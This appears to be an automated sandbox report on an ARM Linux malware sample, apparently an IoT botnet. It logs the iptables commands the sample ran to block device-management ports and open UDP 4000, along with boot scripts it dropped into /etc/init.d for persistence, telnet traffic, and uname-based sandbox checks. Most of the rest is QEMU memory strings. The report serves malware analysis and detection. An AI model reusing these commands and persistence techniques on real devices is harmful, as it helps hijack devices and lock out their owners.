Source: /tmp/bin.sh (PID: 7158) Shell command executed: /bin/sh -c "iptables -I INPUT -p tcp --destination-port 7547 -j DROP" Jump to behavior
Source: /tmp/bin.sh (PID: 7171) Shell command executed: /bin/sh -c "iptables -I OUTPUT -p tcp --source-port 7547 -j DROP" Jump to behavior
Source: /tmp/bin.sh (PID: 7194) Shell command executed: /bin/sh -c "iptables -I INPUT -p tcp --dport 35000 -j DROP" Jump to behavior
Source: /tmp/bin.sh (PID: 7209) Shell command executed: /bin/sh -c "iptables -I INPUT -p tcp --dport 50023 -j DROP" Jump to behavior
Source: /tmp/bin.sh (PID: 7224) Shell command executed: /bin/sh -c "iptables -I OUTPUT -p tcp --sport 50023 -j DROP" Jump to behavior
Source: /tmp/bin.sh (PID: 7241) Shell command executed: /bin/sh -c "iptables -I OUTPUT -p tcp --sport 35000 -j DROP" Jump to behavior
Source: /tmp/bin.sh (PID: 7255) Shell command executed: /bin/sh -c "iptables -I INPUT -p tcp --dport 7547 -j DROP" Jump to behavior
Source: /tmp/bin.sh (PID: 7280) Shell command executed: /bin/sh -c "iptables -I OUTPUT -p tcp --sport 7547 -j DROP" Jump to behavior
Source: /tmp/bin.sh (PID: 7314) Shell command executed: /bin/sh -c "iptables -I INPUT -p udp --destination-port 4000 -j ACCEPT" Jump to behavior
Source: /tmp/bin.sh (PID: 7317) Shell command executed: /bin/sh -c "iptables -I OUTPUT -p udp --source-port 4000 -j ACCEPT" Jump to behavior
Source: /tmp/bin.sh (PID: 7321) Shell command executed: /bin/sh -c "iptables -I PREROUTING -t nat -p udp --destination-port 4000 -j ACCEPT" Jump to behavior
Source: /tmp/bin.sh (PID: 7344) Shell command executed: /bin/sh -c "iptables -I POSTROUTING -t nat -p udp --source-port 4000 -j ACCEPT" Jump to behavior
Source: /tmp/bin.sh (PID: 7369) Shell command executed: /bin/sh -c "iptables -I INPUT -p udp --dport 4000 -j ACCEPT" Jump to behavior
Source: /tmp/bin.sh (PID: 7395) Shell command executed: /bin/sh -c "iptables -I OUTPUT -p udp --sport 4000 -j ACCEPT" Jump to behavior
Source: /tmp/bin.sh (PID: 7420) Shell command executed: /bin/sh -c "iptables -I PREROUTING -t nat -p udp --dport 4000 -j ACCEPT" Jump to behavior
Source: /tmp/bin.sh (PID: 7432) Shell command executed: /bin/sh -c "iptables -I POSTROUTING -t nat -p udp --sport 4000 -j ACCEPT" Jump to behavior
Source: submitted sample Stderr: telnetd: no process foundutelnetd: no process foundscfgmgr: no process foundUnsupported ioctl: cmd=0xffffffff80045705Unsupported ioctl: cmd=0xffffffff80045705Unsupported ioctl: cmd=0xffffffff80045705/bin/sh: 1: cfgtool: not found/bin/sh: 1: cfgtool: not foundUnsupported ioctl: cmd=0xffffffff80045705Unsupported ioctl: cmd=0xffffffff80045705: exit code = 0

Hooking and other Techniques for Hiding and Protection:

barindex
Drops files in suspicious directories
Source: /tmp/bin.sh (PID: 6792) File: /etc/init.d/S95baby.sh Jump to dropped file
Source: /tmp/bin.sh (PID: 6792) File: /etc/init.d/mountall.sh Jump to dropped file
Source: /tmp/bin.sh (PID: 6792) File: /etc/init.d/checkfs.sh Jump to dropped file
Source: /tmp/bin.sh (PID: 6792) File: /etc/init.d/umountnfs.sh Jump to dropped file
Source: /tmp/bin.sh (PID: 6792) File: /etc/init.d/mountkernfs.sh Jump to dropped file
Source: /tmp/bin.sh (PID: 6792) File: /etc/init.d/checkroot-bootclean.sh Jump to dropped file
Source: /tmp/bin.sh (PID: 6792) File: /etc/init.d/mountnfs-bootclean.sh Jump to dropped file
Source: /tmp/bin.sh (PID: 6792) File: /etc/init.d/bootmisc.sh Jump to dropped file
Source: /tmp/bin.sh (PID: 6792) File: /etc/init.d/checkroot.sh Jump to dropped file
Source: /tmp/bin.sh (PID: 6792) File: /etc/init.d/hwclock.sh Jump to dropped file
Source: /tmp/bin.sh (PID: 6792) File: /etc/init.d/hostname.sh Jump to dropped file
Source: /tmp/bin.sh (PID: 6792) File: /etc/init.d/mountdevsubfs.sh Jump to dropped file
Source: /tmp/bin.sh (PID: 6792) File: /etc/init.d/mountall-bootclean.sh Jump to dropped file
Source: /tmp/bin.sh (PID: 6792) File: /etc/init.d/mountnfs.sh Jump to dropped file
Source: /tmp/bin.sh (PID: 6792) File: /usr/bin/gettext.sh Jump to dropped file
Source: /tmp/bin.sh (PID: 6792) File: /usr/sbin/alsa-info.sh Jump to dropped file
Uses known network protocols on non-standard ports
Source: unknown Network traffic detected: HTTP traffic on port 23 -> 34674
Source: unknown Network traffic detected: HTTP traffic on port 23 -> 34680
Source: unknown Network traffic detected: HTTP traffic on port 23 -> 34684
Source: unknown Network traffic detected: HTTP traffic on port 23 -> 34686
Source: unknown Network traffic detected: HTTP traffic on port 23 -> 34688
Source: unknown Network traffic detected: HTTP traffic on port 23 -> 34690
Source: unknown Network traffic detected: HTTP traffic on port 23 -> 34692
Source: unknown Network traffic detected: HTTP traffic on port 23 -> 34694
Source: unknown Network traffic detected: HTTP traffic on port 23 -> 34696
Source: unknown Network traffic detected: HTTP traffic on port 23 -> 35276
Source: unknown Network traffic detected: HTTP traffic on port 23 -> 35278
Source: unknown Network traffic detected: HTTP traffic on port 23 -> 35290
Source: unknown Network traffic detected: HTTP traffic on port 23 -> 35292
Source: unknown Network traffic detected: HTTP traffic on port 23 -> 35298
Source: unknown Network traffic detected: HTTP traffic on port 23 -> 35300
Source: unknown Network traffic detected: HTTP traffic on port 32848 -> 8443
Executes the "modprobe" command used for loading kernel modules
Source: /sbin/iptables (PID: 6842) Modprobe: /sbin/modprobe -> /sbin/modprobe ip_tables Jump to behavior

Malware Analysis System Evasion:

barindex
Uses the "uname" system call to query kernel version information (possible evasion)
Source: /tmp/bin.sh (PID: 6777) Queries kernel information via 'uname': Jump to behavior
Source: /tmp/bin.sh (PID: 6792) Queries kernel information via 'uname': Jump to behavior
Source: /tmp/bin.sh (PID: 6815) Queries kernel information via 'uname': Jump to behavior
Source: /sbin/modprobe (PID: 6842) Queries kernel information via 'uname': Jump to behavior
Source: /usr/share/apport/apport-gtk (PID: 7504) Queries kernel information via 'uname': Jump to behavior
Source: /usr/share/apport/apport-gtk (PID: 7526) Queries kernel information via 'uname': Jump to behavior
Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmp Binary or memory string: qemu_opts_set_defaults
Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmp Binary or memory string: /build/qemu-tYeErX/qemu-2.5+dfsg/qapi/string-output-visitor.c
Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmp Binary or memory string: /build/qemu-tYeErX/qemu-2.5+dfsg/qom/container.c
Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmp Binary or memory string: qemu_thread_naming
Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmp Binary or memory string: qemu_opt_foreach
Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmp Binary or memory string: qemu_getauxval
Source: kvm-test-1-run.sh.8.dr Binary or memory string: qemu_args="`specify_qemu_cpus "$QEMU" "$qemu_args" "$cpu_count"`"
Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmp Binary or memory string: qemu_opt_get_size_del
Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmp Binary or memory string: qemu_free_irqs
Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmp Binary or memory string: qemu_sem_timedwait
Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmp Binary or memory string: /build/qemu-tYeErX/qemu-2.5+dfsg/hw/core/irq.c
Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmp Binary or memory string: /build/qemu-tYeErX/qemu-2.5+dfsg/linux-user/mmap.c
Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmp Binary or memory string: /build/qemu-tYeErX/qemu-2.5+dfsg/util/envlist.c
Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmp Binary or memory string: qemu: Unsupported ARM syscall: 0x%x
Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmp Binary or memory string: qemu_strtosz_suffix
Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmp Binary or memory string: /usr/lib/x86_64-linux-gnu/qemu
Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmp Binary or memory string: qemu_opts_free
Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmp Binary or memory string: qemu_ld_i32
Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmp Binary or memory string: arm926_initfnarm946_initfnarm1026_initfnarm1136_r2_initfnarm1136_initfnarm1176_initfnarm11mpcore_initfncortex_m3_initfnarm_v7m_cpu_exec_interruptarm_v7m_class_initcortex_m4_initfncortex_r5_initfncortex_a8_initfncortex_a9_initfncortex_a15_initfnti925t_initfnsa1100_initfnsa1110_initfnpxa250_initfnpxa255_initfnpxa260_initfnpxa261_initfnpxa262_initfnpxa270a0_initfnpxa270a1_initfnpxa270b0_initfnpxa270b1_initfnpxa270c0_initfnpxa270c5_initfnarm_any_initfnarm_cpu_initfnarm_cpu_post_initarm_cpu_finalizefnarm_cpu_realizefncp_reg_check_resetarm_cpu_resetarm_cpu_has_workarm_cpu_set_pcarm_cpu_handle_mmu_faultarm_disas_set_infoarm_cpu_class_initarm_cpu_exec_interrupt/build/qemu-tYeErX/qemu-2.5+dfsg/target-arm/gdbstub.carm_cpu_gdb_write_registerarm_cpu_gdb_read_register/build/qemu-tYeErX/qemu-2.5+dfsg/target-arm/crypto_helper.cdecrypt < 2helper_crypto_sha1_3reg
Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmp Binary or memory string: opt->desc && opt->desc->type == QEMU_OPT_BOOL
Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmp Binary or memory string: qemu_try_memalign
Source: functions.sh0.8.dr Binary or memory string: # identify_qemu_append qemu-cmd
Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmp Binary or memory string: qemu_utimens
Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmp Binary or memory string: qemu_opts_from_qdict
Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmp Binary or memory string: qemu_mutex_trylock
Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmp Binary or memory string: qemu: %s: %s
Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmp Binary or memory string: qemu_allocate_irqs
Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmp Binary or memory string: qemu_set_tty_echo
Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmp Binary or memory string: qemu_log_mask
Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmp Binary or memory string: /build/qemu-tYeErX/qemu-2.5+dfsg/util/oslib-posix.c
Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmp Binary or memory string: qemu_print_log_usage
Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmp Binary or memory string: /build/qemu-tYeErX/qemu-2.5+dfsg/translate-all.c
Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmp Binary or memory string: qemu: Unsupported syscall: %d
Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmp Binary or memory string: qemu_pipe
Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmp Binary or memory string: qemu_str_to_log_mask
Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmp Binary or memory string: qemu_opt_get_size
Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmp Binary or memory string: _ZN16QEMUDisassemblerD2Ev
Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmp Binary or memory string: /build/qemu-tYeErX/qemu-2.5+dfsg/target-arm/crypto_helper.c
Source: functions.sh0.8.dr Binary or memory string: # Output arguments for qemu arguments based on the TORTURE_QEMU_MAC
Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmp Binary or memory string: qemu_sem_destroy
Source: functions.sh0.8.dr Binary or memory string: identify_qemu () {
Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmp Binary or memory string: /build/qemu-tYeErX/qemu-2.5+dfsg/tcg/i386/tcg-target.c
Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmp Binary or memory string: qemu.sstep
Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmp Binary or memory string: /build/qemu-tYeErX/qemu-2.5+dfsg/target-arm/gdbstub.c
Source: functions.sh0.8.dr Binary or memory string: # Usually this will be one of /usr/bin/qemu-system-*
Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmp Binary or memory string: qemu_init_exec_dir
Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmp Binary or memory string: qemu_strnlen
Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmp Binary or memory string: /build/qemu-tYeErX/qemu-2.5+dfsg/qapi/string-input-visitor.c
Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmp Binary or memory string: err && errp != &error_abort*errp == NULL%s: %sCould not open '%s'errp && *errperror_free_or_aborterror_append_hinterror_setv/build/qemu-tYeErX/qemu-2.5+dfsg/util/qemu-error.cfname || cur_loc->kind == LOC_FILE!loc->prevcur_loc == loc && loc->prev%s:%d:loc_set_fileloc_restoreloc_poploc_push_restore'on' or 'off'a numbera sizen < sizeof(buf)%.17gNo description availableSupported options:%-16s %s
Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmp Binary or memory string: /build/qemu-tYeErX/qemu-2.5+dfsg/qobject/qint.c
Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmp Binary or memory string: qemu_opts_del
Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmp Binary or memory string: qemu_opt_get_number_helper
Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmp Binary or memory string: qemu_opt_unset
Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmp Binary or memory string: C/build/qemu-tYeErX/qemu-2.5+dfsg/util/unicode.clen > 1 && len < 7
Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmp Binary or memory string: qemu: Unsupported SemiHosting SWI 0x%02x
Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmp Binary or memory string: qemufpa
Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmp Binary or memory string: /build/qemu-tYeErX/qemu-2.5+dfsg/qapi/qapi-visit-core.c
Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmp Binary or memory string: qemu_real_host_page_mask
Source: kvm-test-1-run.sh.8.dr Binary or memory string: grep "^(qemu) qemu:" $resdir/kvm-test-1-run.sh.out >> $resdir/Warnings 2>&1
Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmp Binary or memory string: qemu_ram_munmap
Source: functions.sh0.8.dr Binary or memory string: # Appends a string containing "-smp XXX" to qemu-args, unless the incoming
Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmp Binary or memory string: qemu: missing argument for option '%s'
Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmp Binary or memory string: /build/qemu-tYeErX/qemu-2.5+dfsg/target-arm/cpu.cPMSAv7 MPU #regions invalid %u
Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmp Binary or memory string: /build/qemu-tYeErX/qemu-2.5+dfsg/target-arm/cpu.huse_icount%08x-%08x %08x %c%c%c
Source: kvm.sh.8.dr Binary or memory string: TORTURE_QEMU_MAC=$2
Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmp Binary or memory string: qemu_open
Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmp Binary or memory string: BlockdevOptionsGenericCOWFormatACPI_DEVICE_OSTqovqapi-event.cobj != NULLBALLOON_CHANGEBLOCK_IMAGE_CORRUPTEDfatalBLOCK_IO_ERRORoperationreasonBLOCK_JOB_CANCELLEDBLOCK_JOB_COMPLETEDBLOCK_JOB_ERRORBLOCK_JOB_READYBLOCK_WRITE_THRESHOLDamount-exceededwrite-thresholdDEVICE_DELETEDDEVICE_TRAY_MOVEDtray-openGUEST_PANICKEDMEM_UNPLUG_ERRORMIGRATIONNIC_RX_FILTER_CHANGEDPOWERDOWNQUORUM_FAILUREsector-numsectors-countQUORUM_REPORT_BADRTC_CHANGESHUTDOWNSPICE_CONNECTEDSPICE_DISCONNECTEDSPICE_INITIALIZEDSPICE_MIGRATE_COMPLETEDSUSPEND_DISKVNC_CONNECTEDVNC_DISCONNECTEDVNC_INITIALIZEDVSERPORT_CHANGEWAKEUPWATCHDOGqapi_event_send_watchdogqapi_event_send_vserport_changeqapi_event_send_vnc_initializedqapi_event_send_vnc_disconnectedqapi_event_send_vnc_connectedqapi_event_send_spice_initializedqapi_event_send_spice_disconnectedqapi_event_send_spice_connectedqapi_event_send_rtc_changeqapi_event_send_quorum_report_badqapi_event_send_quorum_failureqapi_event_send_nic_rx_filter_changedqapi_event_send_migrationqapi_event_send_mem_unplug_errorqapi_event_send_guest_panickedqapi_event_send_device_tray_movedqapi_event_send_device_deletedqapi_event_send_block_write_thresholdqapi_event_send_block_job_readyqapi_event_send_block_job_errorqapi_event_send_block_job_completedqapi_event_send_block_job_cancelledqapi_event_send_block_io_errorqapi_event_send_block_image_corruptedqapi_event_send_balloon_changeqobject_decrefqapi_event_send_acpi_device_ostuint8_tuint16_tuint32_tstringsInvalid parameter '%s'/build/qemu-tYeErX/qemu-2.5+dfsg/qapi/qapi-visit-core.cinput_type_enuminput_type_enumoutput_type_enumoutput_type_enumvisit_type_int32visit_type_int16visit_type_int8visit_type_uint32visit_type_uint16visit_type_uint8/build/qemu-tYeErX/qemu-2.5+dfsg/qapi/qapi-dealloc-visitor.cobj == NULLqapi_dealloc_end_listqobject_decref/build/qemu-tYeErX/qemu-2.5+dfsg/qapi/qmp-input-visitor.cQMP input object member '%s' is unexpectedParameter '%s' is missingintegerqiv->nb_stack > 0An internal buffer overranQDictqmp_input_pushqmp_input_start_structqmp_input_start_listqmp_input_popqmp_input_popqmp_input_type_intqmp_input_type_boolqmp_input_type_strqmp_input_type_numberqobject_typeqmp_input_get_next_typeqobject_decref/build/qemu-tYeErX/qemu-2.5+dfsg/qapi/qmp-output-visitor.cqmp_output_next_listqobject_typeqobject_decrefyestruean int64 value or range/build/qemu-tYeErX/qemu-2.5+dfsg/qapi/string-input-visitor.cparse_type_intparse_type_sizeparse_type_boolparse_type_strparse_type_number%f"%s"<null>sov->list_mode == LM_NONEiBi < ARRAY_SIZE(suffixes)%lu (%0.3g %c%s)0x%lx-0x%lx%ld-%ld/build/qemu-tYeErX/qemu-2.5+dfsg/qapi/string-output-visitor.csov->list_mode == LM_STARTED || sov->list_mode == LM_END || sov->list_mode == LM_NONE || sov->list_mode == LM_IN_PROGRESSsov->range_start.s < sov->range_end.sprint_type_intBKMGTPEprint_type_sizestart_listend_list@
Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmp Binary or memory string: /build/qemu-tYeErX/qemu-2.5+dfsg/thunk.c*type_ptr < max_struct_entriesid < max_struct_entriesInvalid type 0x%x
Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmp Binary or memory string: opt->desc && opt->desc->type == QEMU_OPT_NUMBER
Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmp Binary or memory string: qemu_opt_has_help_opt
Source: functions.sh0.8.dr Binary or memory string: specify_qemu_cpus () {
Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmp Binary or memory string: /build/qemu-tYeErX/qemu-2.5+dfsg/qom/cpu.c
Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmp Binary or memory string: qemu_opts_reset
Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmp Binary or memory string: qemu_vfree
Source: kvm.sh.8.dr Binary or memory string: TORTURE_QEMU_ARG="$2"
Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmp Binary or memory string: QEMU_RESERVED_VA
Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmp Binary or memory string: qemu_strtosz_suffix_unit
Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmp Binary or memory string: qemu_ld_i64
Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmp Binary or memory string: QEMU_SET_ENV=var1=val2,var2=val2 QEMU_UNSET_ENV=LD_PRELOAD,LD_DEBUG
Source: kvm.sh.8.dr Binary or memory string: TORTURE_QEMU_CMD="$2"
Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmp Binary or memory string: qemu_%s_%s_%d.core
Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmp Binary or memory string: /build/qemu-tYeErX/qemu-2.5+dfsg/exec.cqemu: fatal: cpu_exec_init/build/qemu-tYeErX/qemu-2.5+dfsg/translate-all.cInternal error: code buffer overflow
Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmp Binary or memory string: cpu_write_elf32_qemunote
Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmp Binary or memory string: /build/qemu-tYeErX/qemu-2.5+dfsg/target-arm/op_helper.c!arm_is_secure(env) && arm_current_el(env) != 3/build/qemu-tYeErX/qemu-2.5+dfsg/target-arm/internals.h!excp_is_internal(excp)cur_el >= 1 && cur_el <= 3el >= 1 && el <= 3
Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmp Binary or memory string: QEMU_UNSET_ENV environment variables to set and unset
Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmp Binary or memory string: Protecting guest commpageVFS: argc is wrong%Y%m%d-%H%M%Sqemu_%s_%s_%d.coreCOREunable to dump %08x
Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmp Binary or memory string: qemu_opts_set
Source: functions.sh0.8.dr Binary or memory string: # and the TORTURE_QEMU_INTERACTIVE environment variable.
Source: kvm-test-1-run.sh.8.dr Binary or memory string: # Generate architecture-specific and interaction-specific qemu arguments
Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmp Binary or memory string: qemu_get_cpu
Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmp Binary or memory string: tcg_gen_qemu_st_i32
Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmp Binary or memory string: qemu_opts_validate
Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmp Binary or memory string: _ZTI16QEMUDisassembler
Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmp Binary or memory string: qemu_opt_get
Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmp Binary or memory string: QEMU_CPU
Source: kvm-test-1-run.sh.8.dr Binary or memory string: if kill -0 $qemu_pid > /dev/null 2>&1
Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmp Binary or memory string: /build/qemu-tYeErX/qemu-2.5+dfsg/linux-user/signal.c
Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmp Binary or memory string: /build/qemu-tYeErX/qemu-2.5+dfsg/target-arm/translate.c!arm_dc_feature(s, ARM_FEATURE_V8)%s access to unsupported AArch32 64 bit system register cp:%d opc1: %d crm:%d (%s)
Source: kvm.sh.8.dr Binary or memory string: -v TORTURE_QEMU_ARG="$TORTURE_QEMU_ARG" \
Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmp Binary or memory string: qemu_loglevel
Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmp Binary or memory string: @/build/qemu-tYeErX/qemu-2.5+dfsg/target-arm/arm-semi.cqemu: Unsupported SemiHosting SWI 0x%02x
Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmp Binary or memory string: qemu_fdatasync
Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmp Binary or memory string: qemu_opts_do_parse
Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmp Binary or memory string: qemu-arm version 2.5.0 (Debian 1:2.5+dfsg-5ubuntu10.32), Copyright (c) 2003-2008 Fabrice Bellard
Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmp Binary or memory string: host_start || host_sizeMultiple PT_INTERP entriesInvalid PT_INTERP entrycannot mmap brkmmap stack/usr/lib/libc.so.1/usr/lib/ld.so.1sp_auxv - sp == sizeunable to get current timestamp: %s/build/qemu-tYeErX/qemu-2.5+dfsg/linux-user/elfload.cReserved 0x%lx bytes of guest address space
Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmp Binary or memory string: /build/qemu-tYeErX/qemu-2.5+dfsg/qom/object_interfaces.c
Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmp Binary or memory string: /build/qemu-tYeErX/qemu-2.5+dfsg/gdbstub.c
Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmp Binary or memory string: qemu-arm version 2.5.0 (Debian 1:2.5+dfsg-5ubuntu10.32), Copyright (c) 2003-2008 Fabrice Bellardusage: qemu-arm [options] program [arguments...]
Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmp Binary or memory string: qemu_set_block
Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmp Binary or memory string: /build/qemu-tYeErX/qemu-2.5+dfsg/target-arm/cpu.c
Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmp Binary or memory string: tcg_gen_qemu_ld_i32
Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmp Binary or memory string: qemu_thread_atexit_add
Source: functions.sh0.8.dr Binary or memory string: identify_qemu_args () {
Source: kvm-test-1-run.sh.8.dr Binary or memory string: echo "!!! PID $qemu_pid hung at $kruntime vs. $seconds seconds" >> $resdir/Warnings 2>&1
Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmp Binary or memory string: /build/qemu-tYeErX/qemu-2.5+dfsg/target-arm/cpu.h
Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmp Binary or memory string: qemu_sem_init
Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmp Binary or memory string: qemu_fork
Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmp Binary or memory string: qemu_ram_mmap
Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmp Binary or memory string: /build/qemu-tYeErX/qemu-2.5+dfsg/qobject/qnull.c
Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmp Binary or memory string: qemu: unknown option '%s'
Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmp Binary or memory string: qemu_sem_wait
Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmp Binary or memory string: QEMU_RAND_SEED
Source: functions.sh0.8.dr Binary or memory string: echo qemu-system-ppc64
Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmp Binary or memory string: qemu_register_reset
Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmp Binary or memory string: qemu_cond_init
Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmp Binary or memory string: _ZN16QEMUDisassembler13ProcessOutputEPKN4vixl11InstructionE
Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmp Binary or memory string: 16QEMUDisassembler
Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmp Binary or memory string: qemu: fatal:
Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmp Binary or memory string: qemu_strtol
Source: functions.sh0.8.dr Binary or memory string: identify_qemu_vcpus () {
Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmp Binary or memory string: qemu_irq_split
Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmp Binary or memory string: /build/qemu-tYeErX/qemu-2.5+dfsg/qobject/qjson.c
Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmp Binary or memory string: /build/qemu-tYeErX/qemu-2.5+dfsg/tcg/optimize.c/build/qemu-tYeErX/qemu-2.5+dfsg/include/qemu/bitops.hstart >= 0 && length > 0 && length <= 64 - startnb_oargs == 1
Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmp Binary or memory string: qemu_irq_proxy
Source: kvm-test-1-run.sh.8.dr Binary or memory string: echo $QEMU $qemu_args -m 512 -kernel $resdir/bzImage -append \"$qemu_append $boot_args\" > $resdir/qemu-cmd
Source: kvm-test-1-run.sh.8.dr Binary or memory string: qemu_args="$qemu_args `identify_qemu_args "$QEMU" "$builddir/console.log"`"
Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmp Binary or memory string: qemu_thread_exit
